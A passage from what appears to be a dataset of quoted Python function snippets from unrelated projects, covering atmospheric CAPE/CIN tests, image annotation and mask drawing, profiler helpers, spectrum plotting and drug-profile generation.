np.nan, -18.5, -21, -23.7, np.nan,\n -28.3, np.nan, -32.6, np.nan, -33.8, -35, -35.1, -38.1, -40,\n -43.3, -44.6, -46.4, -47, -49.2, -50.7]) * units.degC\n lfc_p, _ = lfc(pressure, temperature, dewpoint)\n profile = parcel_profile(pressure, temperature[0], dewpoint[0])\n cape, cin = cape_cin(pressure, temperature, dewpoint, profile)\n sbcape, sbcin = surface_based_cape_cin(pressure, temperature, dewpoint)\n mucape, mucin = most_unstable_cape_cin(pressure, temperature, dewpoint)\n assert_nan(lfc_p, units.hPa)\n assert_almost_equal(cape, 0 * units('J/kg'), 0)\n assert_almost_equal(cin, 0 * units('J/kg'), 0)\n assert_almost_equal(sbcape, 0 * units('J/kg'), 0)\n assert_almost_equal(sbcin, 0 * units('J/kg'), 0)\n assert_almost_equal(mucape, 0 * units('J/kg'), 0)\n assert_almost_equal(mucin, 0 * units('J/kg'), 0)", "def on_draw_over_image(self):", "def draw_annotation(img, boxes, klass, polygons=None, is_crowd=None):\n labels = []\n assert len(boxes) == len(klass)\n if is_crowd is not None:\n assert len(boxes) == len(is_crowd)\n for cls, crd in zip(klass, is_crowd):\n clsname = cfg.DATA.CLASS_NAMES[cls]\n if crd == 1:\n clsname += ';Crowd'\n labels.append(clsname)\n else:\n for cls in klass:\n labels.append(cfg.DATA.CLASS_NAMES[cls])\n img = viz.draw_boxes(img, boxes, labels)\n\n if polygons is not None:\n for p in polygons:\n mask = polygons_to_mask(p, img.shape[0], img.shape[1])\n img = draw_mask(img, mask)\n return img", "def setprofile(self, w_func):\n if self.space.is_w(w_func, self.space.w_None):\n self.profilefunc = None\n self.w_profilefuncarg = None\n else:\n self.setllprofile(app_profile_call, w_func)", "def annotate_image(self, image, results):\n predictedObjects = []\n for i in range(len(results)):\n objectParameters = []\n x = int(results[i][1])\n y = int(results[i][2])\n w = int(results[i][3])\n h = int(results[i][4])\n # print(x, y, w, h, results[i][0])\n imageHeight, imageWidth, _ = image.shape\n w = w // 2\n h = h // 2\n # change to truncate boxes which go outside the image\n xmin, xmax, ymin, ymax = 0, 0, 0, 0\n xmin = 3 if not max(x - w, 0) else (x - w)\n xmax = imageWidth - 3 if not min(x + w - imageWidth, 0) \\\n else (x + w)\n ymin = 1 if not max(y - h, 0) else (y - h)\n ymax = imageHeight - 3 if not min(y + h - imageHeight, 0) \\\n else (y + h)\n if self.verbose:\n print('Class : ' + results[i][0] + ', [x, y, w, h] [' +\n str(x) + ', ' + str(y) + ', ' + str(w) + ', ' + str(h) +\n '] Confidence : ' + str(results[i][5]))\n \n # Each class must have a unique color\n color = tuple([(j * (1+self.classes.index(results[i][0])) % 255) \\\n for j in self.seed])\n cv2.rectangle(image, (xmin, ymin), (xmax, ymax), color, 2)\n if ymin <= 20:\n cv2.rectangle(\n image, (xmin, ymin), (xmax, ymin + 20), color, -1\n )\n cv2.putText(\n image, results[i][0] + ': %.2f' % results[i][5],\n (xmin+5, ymin+15), cv2.FONT_HERSHEY_SIMPLEX, 0.5,\n (255, 255, 255), 2\n )\n else:\n cv2.rectangle(image, (xmin, ymin), (xmax, ymin-20), color, -1)\n cv2.putText(\n image, results[i][0] + ': %.2f' % results[i][5],\n (xmin+5, ymin-8), cv2.FONT_HERSHEY_SIMPLEX, 0.5,\n (255, 255, 255), 2\n )\n objectParameters = [\n results[i][0], xmin, ymin, xmax, ymax, results[i][5]\n ]\n predictedObjects.append(objectParameters)\n return image, predictedObjects\n # if self.outputFile:\n # cv2.imwrite(self.outputFile,image)", "def stop_if_active(self,\n func,\n profile_id,\n profiler,\n sort_by):\n # Disable the profiler & log the output\n if self._active(profile_id):\n profiler.disable()\n\n buf = BytesIO()\n\n ps = 
pstats.Stats(profiler,\n stream=buf)\n ps.sort_stats(sort_by)\n ps.print_stats()\n\n logging.info(u'Profile (Profile ID = {id}) for \"{mod}.{name}\":\\n{stats}'\n .format(id=profile_id,\n mod=func.__module__,\n name=func.__name__,\n stats=buf.getvalue()))", "def test_get_spawning_profile_list():\n center = Coordinates(1 , 1)\n radius = 10\n speed_limit = 20\n default_driver = DriverProfile(\"Default\", 8, 2, 2, 0, 30, 3, 1)\n default_vehicle = VehicleProfile(\"Default\", 5, 15, 2, 2, 1000, 65)\n default_spawn = SpawningProfile(\"Default\", default_driver, default_vehicle)\n\n i = Intersection(center, radius, speed_limit)\n\n l = i.get_spawning_profile_list()\n\n assert not l\n\n i.add_spawning_profile(default_spawn)\n\n assert l\n\n assert len(l) == 1\n\n i.remove_spawning_profile(default_spawn)\n\n assert len(l) == 0\n assert not l", "def check_profile(args):\n with_dataset(args, Dataset._check_profile)", "def prepro(I):\n I = I[35:195] # crop\n I = I[::2,::2,0] # downsample by a factor of 2\n I[I == 144] = 0 # erase background (bg type 1)\n I[I == 109] = 0 # erase background (bg type 2)\n I[I != 0] = 1 # set everything else (ball, paddles) to 1\n return I.astype(np.float)", "def profile_step(self):\n import profile\n\n profile.run(\"world.step()\")", "def pre_draw(self):", "def __drawAndErase(self, boxToDraw, boxToErase=None):\n dc = wx.ClientDC(self.drawingSurface)\n dc.BeginDrawing()\n dc.SetPen(wx.Pen(wx.WHITE, 1, wx.DOT))\n dc.SetBrush(wx.TRANSPARENT_BRUSH)\n dc.SetLogicalFunction(wx.XOR)\n if boxToErase:\n r = wx.Rect(*boxToErase)\n dc.DrawRectangleRect(r)\n\n r = wx.Rect(*boxToDraw)\n dc.DrawRectangleRect(r)\n dc.EndDrawing()", "def _seg_image(self, x, y, r_cut=100):\n snr=self.snr\n npixels=self.npixels\n bakground = self.bakground\n error= self.bkg_rms(x,y,r_cut)\n kernel = self.kernel\n image_cutted = self.cut_image(x,y,r_cut)\n image_data = image_cutted\n threshold_detect_objs=detect_threshold(data=image_data, nsigma=snr,error=error)\n segments=detect_sources(image_data, threshold_detect_objs, npixels=npixels, filter_kernel=kernel)\n segments_deblend = deblend_sources(image_data, segments, npixels=npixels,nlevels=10)\n segments_deblend_info = source_properties(image_data, segments_deblend)\n nobjs = segments_deblend_info.to_table(columns=['id'])['id'].max()\n xcenter = segments_deblend_info.to_table(columns=['xcentroid'])['xcentroid'].value\n ycenter = segments_deblend_info.to_table(columns=['ycentroid'])['ycentroid'].value\n image_data_size = np.int((image_data.shape[0] + 1) / 2.)\n dist = ((xcenter - image_data_size) ** 2 + (ycenter - image_data_size) ** 2) ** 0.5\n c_index = np.where(dist == dist.min())[0][0]\n center_mask=(segments_deblend.data==c_index+1)*1 #supposed to be the data mask\n obj_masks = []\n for i in range(nobjs):\n mask = ((segments_deblend.data==i+1)*1)\n obj_masks.append(mask)\n xmin = segments_deblend_info.to_table(columns=['bbox_xmin'])['bbox_xmin'].value\n xmax = segments_deblend_info.to_table(columns=['bbox_xmax'])['bbox_xmax'].value\n ymin = segments_deblend_info.to_table(columns=['bbox_ymin'])['bbox_ymin'].value\n ymax = segments_deblend_info.to_table(columns=['bbox_ymax'])['bbox_ymax'].value\n xmin_c, xmax_c = xmin[c_index], xmax[c_index]\n ymin_c, ymax_c = ymin[c_index], ymax[c_index]\n xsize_c = xmax_c - xmin_c\n ysize_c = ymax_c - ymin_c\n if xsize_c > ysize_c:\n r_center = np.int(xsize_c)\n else:\n r_center = np.int(ysize_c)\n center_mask_info= [center_mask, r_center, xcenter, ycenter, c_index]\n return obj_masks, center_mask_info, 
segments_deblend", "def get_instance(self, index):\n # start = time.time()\n # Load the source image and its annotations\n img = self.load_image(index)\n w_img, h_img = img.size\n w, h = 2*self.image_size[0], 2*self.image_size[1]\n anns = self.load_annotations(index)\n # print(\"Loading time = {:.5f}s\".format(time.time() - start))\n # start = time.time()\n img = img.resize((w, h))\n\n # Initialize blank masks for each target class\n masks = {label: Image.new(\"L\", (w, h)) for label in self.target_classes}\n draw_masks = {label: ImageDraw.Draw(masks[label]) for label in self.target_classes}\n combined_mask = Image.new(\"L\", (w, h))\n combined_draw_mask = ImageDraw.Draw(combined_mask)\n\n # Get valid present annotations\n anns = [x for x in anns if type(x) == dict]\n \n # Combine some classes\n for i in range(len(anns)):\n anns[i] = {k.replace('Circular Crypts', 'Good Crypts'): v for k, v in anns[i].items()}\n\n # Gathering polygon points - A dict of points for each target class\n poly_pts = {label: [] for label in self.target_classes}\n for ann in anns:\n if ann['label'] in self.target_classes:\n pts = np.array(ann['points'])\n pts[:, 0] = pts[:, 0] * (w*1. / w_img)\n pts[:, 1] = pts[:, 1] * (h*1. / h_img)\n poly_pts[ann['label']].append(pts)\n\n # Drawing the masks\n for label in self.target_classes:\n if label != \"Interpretable Region\":\n polygons = poly_pts[label]\n for poly in polygons:\n coords = [(pt[0], pt[1]) for pt in poly]\n draw_masks[label].polygon(xy=coords, fill=255)\n combined_draw_mask.polygon(coords, 255)\n \n # Making the Interpretable Region mask\n if (self.mode == 'seg' or self.mode == 'full') and 'Interpretable Region' in self.target_classes:\n pink_mass = img.copy()\n enhancer = ImageEnhance.Contrast(pink_mass)\n pink_mass = enhancer.enhance(4.0)\n pink_mass = np.array(pink_mass)\n pink_mass = 255 - ((pink_mass[:, :, 0] > 150) * (pink_mass[:, :, 1] > 150) * (pink_mass[:, :, 2] > 150)) * 255\n IRs = poly_pts[\"Interpretable Region\"]\n IR_image = Image.new('L', (w, h))\n IR_draw_image = ImageDraw.Draw(IR_image)\n for i in range(len(IRs)):\n IR = IRs[i]\n IR = [(p[0], p[1]) for p in IR]\n IR_draw_image.polygon(IR, 255)\n pink_mass *= np.array(IR_image) // 255\n pink_mass = Image.fromarray(pink_mass.astype(np.uint8))\n masks['Interpretable Region'] = pink_mass\n\n # Gathering IR boxes in format x, y, w, h where x, y are top left coords\n bboxes = []\n if (self.mode == 'loc' or self.mode == 'full') and \"Interpretable Region\" in self.target_classes:\n IRs = poly_pts[\"Interpretable Region\"]\n for i in range(len(IRs)):\n IR = IRs[i]\n IR = [(p[0], p[1]) for p in IR]\n IR_image = Image.new('L', (w, h))\n IR_draw_image = ImageDraw.Draw(IR_image)\n IR_draw_image.polygon(IR, 255)\n mul_img_arr = (np.array(IR_image)/255.) 
* (np.array(combined_mask)/255.)\n mul_img_arr = np.array(mul_img_arr*255, np.uint8)\n xmin, ymin, xmax, ymax = self.points(mul_img_arr)\n bboxes.append([xmin, ymin, xmax, ymax])\n bboxes = np.array(bboxes)\n\n # print(\"Parsing time = {:.5f}s\".format(time.time() - start))\n # start = time.time()\n\n # Visualizing the final data sample mask\n if debug:\n img.show()\n # debug_image = Image.new('RGB', img.size)\n debug_image = np.zeros((img.size[1], img.size[0], 3), np.uint8)\n debug_image[:, :, 0] = np.array(masks['Good Crypts'])\n debug_image[:, :, 1] = np.array(masks['Good Villi'])\n debug_image[:, :, 2] = np.array(masks['Epithelium'])\n if \"Brunner's Gland\" in masks:\n debug_image += np.expand_dims((np.array(masks[\"Brunner's Gland\"])//2), -1)\n if \"Interpretable Region\" in masks:\n debug_image[:, :, :2] += np.expand_dims((np.array(masks[\"Interpretable Region\"])), -1)\n debug_image = Image.fromarray(debug_image)\n debug_draw = ImageDraw.Draw(debug_image)\n for IR in poly_pts['Interpretable Region']:\n IR = [(p[0], p[1]) for p in IR]\n debug_draw.polygon(IR, fill=None, outline=\"#ffffff\")\n for bbox in bboxes:\n print(bbox)\n debug_draw.rectangle([bbox[0], bbox[1], bbox[2], bbox[3]], outline=\"#ff00ff\", width=4)\n debug_image.show()\n\n # Perform random augmentations\n if self.augment:\n img, masks, bboxes = self.augment_instance(img, masks, bboxes)\n\n # Visualizing the final data sample mask\n if debug:\n # debug_image = Image.new('RGB', img.size)\n debug_image = np.zeros((img.size[1], img.size[0], 3), np.uint8)\n debug_image[:, :, 0] = np.array(masks['Good Crypts'])\n debug_image[:, :, 1] = np.array(masks['Good Villi'])\n debug_image[:, :, 2] = np.array(masks['Epithelium'])\n if \"Brunner's Gland\" in masks:\n debug_image += np.expand_dims((np.array(masks[\"Brunner's Gland\"])//2), -1)\n if \"Interpretable Region\" in masks:\n debug_image[:, :, :2] += np.expand_dims((np.array(masks[\"Interpretable Region\"])), -1)\n debug_image = Image.fromarray(debug_image)\n debug_draw = ImageDraw.Draw(debug_image)\n for bbox in bboxes:\n print(bbox)\n debug_draw.rectangle([bbox[0], bbox[1], bbox[2], bbox[3]], outline=\"#ff00ff\", width=4)\n debug_image.show()\n\n # Preprocess the image, masks and bboxes\n img, masks, box_grid = self.preprocess_instance(img, masks, bboxes)\n \n # print(\"Aug and preprocess time = {:.5f}s\".format(time.time() - start))\n # start = time.time()\n\n return img, masks, box_grid", "def skip_sample_for_balanced_class(self, img_data):\n class_in_img = False\n for bbox in img_data['bboxes']:\n cls_name = bbox['class']\n if cls_name == self.curr_class:\n class_in_img = True\n ## 更新一次,获取下一次的值\n self.curr_class = next(self.class_cycle)\n break \n if class_in_img:\n return False\n else:\n return True", "def detect_nash_balancing_profil(dico_profs_Vis_Perf_t, \r\n arr_pl_M_T_vars_modif, t):\r\n nash_profils = list()\r\n dico_nash_profils = dict()\r\n cpt_nash = 0\r\n for key_modes_prof, dico_Vi_Pref_t in dico_profs_Vis_Perf_t.items():\r\n cpt_players_stables = 0\r\n dico_profils = dict()\r\n for num_pl_i, mode_i in enumerate(key_modes_prof): # 0 <= num_pl_i < m_player \r\n Vi, ben_i, cst_i = dico_Vi_Pref_t[fct_aux.RACINE_PLAYER\\\r\n +\"_\"+str(num_pl_i)]\r\n state_i = arr_pl_M_T_vars_modif[num_pl_i, t, \r\n fct_aux.AUTOMATE_INDEX_ATTRS[\"state_i\"]]\r\n gamma_i = arr_pl_M_T_vars_modif[num_pl_i, t, \r\n fct_aux.AUTOMATE_INDEX_ATTRS[\"gamma_i\"]]\r\n setx = arr_pl_M_T_vars_modif[num_pl_i, t, \r\n fct_aux.AUTOMATE_INDEX_ATTRS[\"set\"]]\r\n prod_i = 
arr_pl_M_T_vars_modif[num_pl_i, t, \r\n fct_aux.AUTOMATE_INDEX_ATTRS[\"prod_i\"]]\r\n cons_i = arr_pl_M_T_vars_modif[num_pl_i, t, \r\n fct_aux.AUTOMATE_INDEX_ATTRS[\"cons_i\"]]\r\n r_i = arr_pl_M_T_vars_modif[num_pl_i, t, \r\n fct_aux.AUTOMATE_INDEX_ATTRS[\"r_i\"]]\r\n mode_i_bar = None\r\n mode_i_bar = fct_aux.find_out_opposite_mode(state_i, mode_i)\r\n new_key_modes_prof = list(key_modes_prof)\r\n new_key_modes_prof[num_pl_i] = mode_i_bar\r\n new_key_modes_prof = tuple(new_key_modes_prof)\r\n \r\n Vi_bar = None\r\n Vi_bar, ben_i_bar, cst_i_bar \\\r\n = dico_profs_Vis_Perf_t[new_key_modes_prof]\\\r\n [fct_aux.RACINE_PLAYER+\"_\"+str(num_pl_i)]\r\n if Vi >= Vi_bar:\r\n cpt_players_stables += 1\r\n dico_profils[fct_aux.RACINE_PLAYER+\"_\"+str(num_pl_i)+\"_t_\"+str(t)] \\\r\n = {\"set\":setx, \"state\":state_i, \"mode_i\":mode_i, \"Vi\":Vi, \r\n \"gamma_i\":gamma_i, \"prod\":prod_i, \"cons\":cons_i, \"r_i\":r_i,\r\n \"ben\":ben_i, \"cst\":cst_i}\r\n \r\n dico_profils[\"mode_profil\"] = key_modes_prof \r\n \r\n if cpt_players_stables == len(key_modes_prof):\r\n nash_profils.append(key_modes_prof)\r\n Perf_t = dico_profs_Vis_Perf_t[key_modes_prof][\"Perf_t\"]\r\n dico_profils[\"Perf_t\"] = Perf_t\r\n dico_nash_profils[\"NASH_\"+str(cpt_nash)] = (dico_profils)\r\n cpt_nash += 1\r\n \r\n return nash_profils, dico_nash_profils", "def performancePlot(plot=\"ROC\"):\n fig, ax = plt.subplots()\n colors = {\"ML\": \"red\", \"Null YFP\": \"gold\", \"Null DAPI\": \"blue\"}\n mapp = pickle.load(open(\"pickles/mapp_fold_-1.pk\", \"rb\"))\n null_mapp = pickle.load(open(\"pickles/null_YFP_mapp_fold_-1.pk\", \"rb\"))\n null_DAPI_mapp = pickle.load(open(\"pickles/null_DAPI_mapp_fold_-1.pk\", \"rb\"))\n \n i = 0\n for m in [mapp, null_mapp, null_DAPI_mapp]:\n coordinates = [] #list of tuples (thresh, x point, y point) to plot\n for key in m: ##for each threshold\n TPs = sum([x[0] for x in m[key]])\n FPs = sum([x[1] for x in m[key]])\n TNs = sum([x[2] for x in m[key]])\n FNs = sum([x[3] for x in m[key]])\n if plot == \"PRC\":\n x = TPs / float(TPs + FNs) #recall (TPR)\n y = TPs / float(TPs + FPs) #precision\n if plot == \"ROC\":\n x = FPs / float(FPs + TNs) #FPR \n y = TPs / float(TPs + FNs) #recall (TPR)\n if not (np.isnan(x) or np.isnan(y)): \n coordinates.append((key, x, y))\n coordinates = sorted(coordinates, key=lambda x: x[0]) ##sort by threshold\n x = [t[1] for t in coordinates][::-1]\n y = [t[2] for t in coordinates][::-1]\n # print(i, coordinates)\n # thresholds = [entry[0] for entry in coordinates]\n # for j, txt in enumerate(thresholds):\n # ax.annotate(txt, (x[j], y[j]), fontsize=5)\n auc = np.trapz(y,x)\n if i == 0:\n label = \"ML\"\n if i == 1:\n label = \"Null YFP\"\n if i == 2:\n label = \"Null DAPI\" \n ax.plot(x, y, linewidth=2.0, color=colors[label], label=\"{} Model, AUC = {}\".format(label, str(round(auc, 2)))) \n i += 1\n plt.title(\"{} Curves\".format(plot), fontname=\"Times New Roman\", fontsize=12)\n ax.set_xlim((0,1))\n ax.set_ylim((0,1))\n plt.rc('font',family='Times New Roman')\n plt.xticks(fontname=\"Times New Roman\", fontsize=12)\n plt.yticks(fontname=\"Times New Roman\", fontsize=12)\n if plot == \"ROC\":\n ax.set_xlabel(\"False Positive Rate\", fontname=\"Times New Roman\", fontsize=12)\n ax.set_ylabel(\"True Positive Rate\",fontname=\"Times New Roman\", fontsize=12)\n ax.plot([0, .5, 1], [0,.5, 1], linestyle=\"--\", linewidth=1.0, color=\"black\")\n ax.legend(loc='lower right',prop={\"family\":\"Times New Roman\", \"size\":10})\n plt.savefig(\"matplotlib_figures/ROC.png\", 
dpi=300)\n if plot == \"PRC\":\n positives = TPs + FNs ##doesn't matter which map we use, positive prevalence independent of map \n total = TPs + FPs + TNs + FNs \n positive_prevalence = positives / float(total)\n ax.hlines(y=positive_prevalence, xmin=0, xmax=1, linestyle=\"--\", linewidth=1.0, color=\"black\")\n ax.set_xlabel(\"Recall\", fontname=\"Times New Roman\", fontsize=12)\n ax.set_ylabel(\"Precision\",fontname=\"Times New Roman\", fontsize=12)\n ax.set_xlim((0,1))\n ax.set_ylim((0,1))\n ax.legend(loc='upper right',prop={\"family\":\"Times New Roman\", \"size\":10})\n plt.savefig(\"matplotlib_figures/PRC.png\", dpi=300)", "def __init__(self,\n ann_file,\n img_prefix,\n img_means,\n img_stds,\n img_expected_sizes,\n size_divisor=None,\n flip_ratio=0,\n be_cell_size=32,\n be_random_ratio=0.5,\n proposal_file=None,\n num_max_proposals=1000,\n with_mask=False,\n with_crowd=False,\n with_label=True,\n test_mode=False,\n with_background_erasing=False,\n debug=False):\n # load annotations from annotation file\n self.img_infos = self.load_annotations(ann_file)\n # prefix of image path\n self.img_prefix = img_prefix\n # image normalization parameters\n self.img_means, self.img_stds = img_means, img_stds\n # img_expected_sizes list\n self.img_expected_sizes = img_expected_sizes \\\n if isinstance(img_expected_sizes, list) else [img_expected_sizes]\n assert is_list_of(self.img_expected_sizes, tuple)\n # size divisor\n self.size_divisor = size_divisor\n # flip ratio\n self.flip_ratio = flip_ratio\n # background erasing settings\n self.be_cell_size = be_cell_size\n self.be_random_ratio = be_random_ratio\n\n # load the pkl proposal file\n if proposal_file is not None:\n self.proposals = self.load_proposals(proposal_file)\n else:\n self.proposals = None\n self.num_max_proposals = num_max_proposals\n\n # filter images with no annotation during training\n if not test_mode:\n valid_inds = self._filter_imgs()\n self.img_infos = [self.img_infos[i] for i in valid_inds]\n if self.proposals is not None:\n self.proposals = [self.proposals[i] for i in valid_inds]\n\n # with mask or not\n self.with_mask = with_mask\n # with crowd object or not\n self.with_crowd = with_crowd\n # training with label or not\n self.with_label = with_label\n # test mode\n self.test_mode = test_mode\n # with background erasing or not\n self.with_background_erasing = with_background_erasing\n # debug mode\n self.debug = debug\n if self.debug:\n self.img_infos = self.img_infos[:50]\n\n # set aspect ratio flag for images\n if not self.test_mode:\n self._set_group_flag()\n\n # transforms\n self.img_transforms = ImageTransforms(img_means=self.img_means,\n img_stds=self.img_stds,\n size_divisor=self.size_divisor)\n self.bbox_transforms = BboxTransforms()\n self.mask_transforms = MaskTransforms()\n self.background_erasing = BackgroundErasing()", "def ShowOneContourCutBKG(index,all_images,all_pointing,thex0,they0,all_titles,object_name,all_expo,dir_top_img,all_filt):\n plt.figure(figsize=(15,6))\n spec_index_min=100 # cut the left border\n spec_index_max=1900 # cut the right border\n star_halfwidth=70\n \n YMIN=-100\n YMAX=100\n \n figname='contourCutBKG_{}_{}.pdf'.format(all_filt[index],index)\n \n figfilename=os.path.join(dir_top_img,figname) \n \n #center is approximately the one on the original raw image (may be changed)\n #x0=int(all_pointing[index][0])\n x0=int(thex0[index])\n \n \n # Extract the image \n full_image=np.copy(all_images[index])\n \n # refine center in X,Y\n 
star_region_X=full_image[:,x0-star_halfwidth:x0+star_halfwidth]\n \n profile_X=np.sum(star_region_X,axis=0)\n profile_Y=np.sum(star_region_X,axis=1)\n\n NX=profile_X.shape[0]\n NY=profile_Y.shape[0]\n \n X_=np.arange(NX)\n Y_=np.arange(NY)\n \n avX,sigX=weighted_avg_and_std(X_,profile_X**4) # take squared on purpose (weigh must be >0)\n avY,sigY=weighted_avg_and_std(Y_,profile_Y**4)\n \n x0=int(avX+x0-star_halfwidth)\n \n \n # find the center in Y on the spectrum\n yprofile=np.sum(full_image[:,spec_index_min:spec_index_max],axis=1)\n y0=np.where(yprofile==yprofile.max())[0][0]\n\n # cut the image in vertical and normalise by exposition time\n reduc_image=full_image[y0-10:y0+10,:]=0\n reduc_image=full_image[y0+YMIN:y0+YMAX,x0:spec_index_max]/all_expo[index]\n \n reduc_image[:,0:100]=0 # erase central star\n \n X_Size_Pixels=np.arange(0,reduc_image.shape[1])\n Y_Size_Pixels=np.arange(0,reduc_image.shape[0])\n Transverse_Pixel_Size=Y_Size_Pixels-int(float(Y_Size_Pixels.shape[0])/2.)\n \n # calibration in wavelength\n #grating_name=all_filt[index].replace('dia ','')\n grating_name=get_disperser_filtname(all_filt[index])\n \n lambdas=Pixel_To_Lambdas(grating_name,X_Size_Pixels,all_pointing[index],True)\n \n #if grating_name=='Ron200':\n # holo = Hologram('Ron400',verbose=True)\n #else: \n # holo = Hologram(grating_name,verbose=True)\n #lambdas=holo.grating_pixel_to_lambda(X_Size_Pixels,all_pointing[index])\n #if grating_name=='Ron200':\n # lambdas=lambdas*2.\n \n\n X,Y=np.meshgrid(lambdas,Transverse_Pixel_Size) \n T=np.transpose(reduc_image)\n \n \n cs=plt.contourf(X, Y, reduc_image, 100, alpha=1., cmap='jet',origin='lower')\n C = plt.contour(X, Y, reduc_image ,50, colors='white', linewidth=.001,origin='lower') \n \n \n cbar = plt.colorbar(cs) \n \n for line in LINES:\n if line == O2 or line == HALPHA or line == HBETA or line == HGAMMA:\n plt.plot([line['lambda'],line['lambda']],[YMIN,YMAX],'-',color='lime',lw=0.5)\n plt.text(line['lambda'],YMAX*0.8,line['label'],verticalalignment='bottom', horizontalalignment='center',color='lime', fontweight='bold',fontsize=16)\n \n \n \n plt.axis([X.min(), X.max(), Y.min(), Y.max()]); plt.grid(True)\n plt.title(all_titles[index])\n plt.grid(color='white', ls='solid')\n plt.text(200,-5.,all_filt[index],verticalalignment='bottom', horizontalalignment='center',color='yellow', fontweight='bold',fontsize=16)\n plt.xlabel('$\\lambda$ (nm)')\n plt.ylabel('pixels')\n plt.ylim(YMIN,YMAX)\n plt.xlim(0.,1200.)\n plt.savefig(figfilename)", "def truncate_profile(profileDict, startInd, endInd):\n currNumSamples= get_sample_count(profileDict)\n # Update the count of the number of samples\n set_sample_count(profileDict, endInd - startInd + 1)\n # Update the info object \n __truncate_info(profileDict[\"info\"], startInd, endInd, currNumSamples)\n # Update the samples\n sampleDict= profileDict[\"samples\"]\n for key in sampleDict:\n __truncate_all_lists(sampleDict[key], startInd, endInd)", "def _pre_draw_bge(self):\r\n self._pre_draw_common()\r\n # draw rays\r\n self._drawRays()", "def sampleFromShapes(shapes,bounds,dx=10.0,nmax=None,testPercent=1.0,classBalance=None,extent=None,Nsamp=100,\n h1=100.0,h2=300.0,touch_center=True):\n\n xmin,ymin,xmax,ymax = bounds\n shptype = shapes[0]['geometry']['type']\n if shptype not in ['Point','Polygon']:\n raise Exception('Only polygon and point data types supported!')\n\n #Get the shapes projected into an orthographic projection centered on the data \n pshapes,proj = getProjectedShapes(shapes,xmin,xmax,ymin,ymax)\n\n if shptype != 
'Polygon':\n if classBalance is None:\n raise Exception('Class balance *must* be selected when input data are points.')\n else:\n #what is the class balance (assuming polygons)\n if classBalance is None:\n classBalance = getClassBalance(pshapes,bounds,proj)\n\n #get the \"yes\" sample points\n yespoints,nrows,ncols,xvar,yvar,yesidx = getYesPoints(pshapes,proj,dx,nmax,touch_center=touch_center)\n\n #Calculations of how many training and test points are the same for points and polygons.\n #Also sampling of yes points is the same regardless of vector type\n Nmesh = nrows*ncols\n\n #Nsamp may not have been set - until we support custom extents by polygon, just assume that default Nsamp is = Nmesh\n if Nsamp is None:\n print('Assuming total number of samples is the same as the number of pixels in sampling grid. This may not work...')\n Nsamp = Nmesh\n \n NyesTot = len(yespoints)\n NnoTot = Nmesh - NyesTot\n NyesSampTest = int(Nsamp * classBalance * testPercent)\n NyesSampTrain = int(Nsamp * classBalance * (1-testPercent))\n YesSampTot = NyesSampTest + NyesSampTrain\n ratio = NyesTot/float(YesSampTot)\n if YesSampTot > NyesTot:\n raise Exception('Your total number of desired \"yes\" sample pixels is greater than the number available.')\n NnoSampTest = int(Nsamp*(1-classBalance)*testPercent)\n NnoSampTrain = int(Nsamp*(1-classBalance)*(1-testPercent))\n NoSampTot = NnoSampTest + NnoSampTrain\n if NoSampTot > NnoTot:\n raise Exception('Your total number of desired \"no\" sample pixels is greater than the number available.')\n YesTestPoints,RemainingYesPoints = sampleYes(yespoints,NyesSampTest)\n YesTrainPoints,RemainingYesPoints = sampleYes(RemainingYesPoints,NyesSampTrain)\n\n #Sampling of \"no\" points differs between points and polygons\n if shptype == 'Point':\n #for point data, create a boolean grid located on xvar/yvar\n #create a donut around each pixel containing a yes point(s), where 1 is assigned to\n #pixels more than h1 meters from yes point and less than h2 meters from yes point.\n nosampleimg = getNoSampleGrid(yespoints,xvar,yvar,dx,h1,h2)\n NoTestPoints,nosampleimg,sampleidx = sampleNoPoints(nosampleimg,NnoSampTest,xvar,yvar)\n NoTrainPoints,nosampleimg,sampleidx = sampleNoPoints(nosampleimg,NnoSampTrain,xvar,yvar)\n else:\n if extent is None: #we're using the default bounding box of the coverage data\n NoTestPoints,nosampleidx = sampleNo(xvar,yvar,NnoSampTest,yesidx)\n NoTrainPoints,nosampleidx = sampleNo(xvar,yvar,NnoSampTrain,nosampleidx)\n else:\n raise Exception('Custom extents not yet supported') \n\n #project all of the point data sets back to lat/lon\n YesTestPoints = projectBack(YesTestPoints,proj)\n YesTrainPoints = projectBack(YesTrainPoints,proj)\n NoTestPoints = projectBack(NoTestPoints,proj)\n NoTrainPoints = projectBack(NoTrainPoints,proj)\n return (YesTestPoints,YesTrainPoints,NoTestPoints,NoTrainPoints,xvar,yvar,pshapes,proj)", "def generate_profiles_without_network(options):\n\n # Start marker for time measure\n start = time.time()\n\n print(\"\\n\\t\\t-----------------------------------------------------------------------------------------------------------------------\\n\")\n print(\"\\t\\tStarting Drug Interactions ANAlysis (DIANA), a program created by @OLIVA'S LAB. 
First part: Generation of drug profiles\\n\")\n print(\"\\t\\t-----------------------------------------------------------------------------------------------------------------------\\n\")\n\n # Get the script path\n main_path = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))\n toolbox_dir = os.path.join(main_path, 'diana/toolbox')\n\n # Create a directory for the data\n data_dir = os.path.join(options.workspace, \"profiles\")\n create_directory(data_dir)\n\n # Create a directory for the random networks\n other_data_dir = os.path.join(options.workspace, \"other_data\")\n create_directory(other_data_dir)\n\n random_networks_dir = os.path.join(other_data_dir, \"random_networks\")\n create_directory(random_networks_dir)\n\n # Create a drug instance\n drug_instance = diana_drug.Drug(options.drug_name)\n\n\n\n #--------------------------------------#\n # GET INFORMATION FROM CONFIG FILE #\n #--------------------------------------#\n\n # Read the config file\n config_file = os.path.join(main_path, 'config.ini')\n config = ConfigParser.ConfigParser()\n config.read(config_file)\n\n\n\n #------------------------#\n # TARGETS CONTROLLER #\n #------------------------#\n\n # TARGETS CONTROLLER: Checks the targets provided by the user. If necessary, performs a search \n # in BIANA database to obtain more targets\n\n # Check if the targets file is provided\n if options.targets and os.path.isfile(options.targets):\n drug_instance.obtain_targets_from_file(options.targets, options.proteins_type_id)\n else:\n # Create a connection to BIANA database\n biana_cnx = mysql.connector.connect(user=config.get('BIANA', 'user'), password=config.get('BIANA', 'password'),\n host=config.get('BIANA', 'host'),\n database=config.get('BIANA', 'database'))\n # Obtain the targets from BIANA\n drug_instance.obtain_targets_from_BIANA(biana_cnx, options.proteins_type_id, config.get('BIANA', 'unification_protocol'))\n biana_cnx.close()\n\n print( \" DIANA INFO:\\tThe targets provided for the drug {} are:\\n\\t\\t{}.\\n\".format( options.drug_name, ', '.join([ str(x) for x in drug_instance.targets]) ) )\n\n\n\n #------------------------------------------#\n # CREATE DIRECTORIES AND GENERAL FILES #\n #------------------------------------------#\n\n # Create a directory for the drug\n drug_id = diana_drug.generate_drug_id(drug_instance.drug_name, drug_instance.targets, 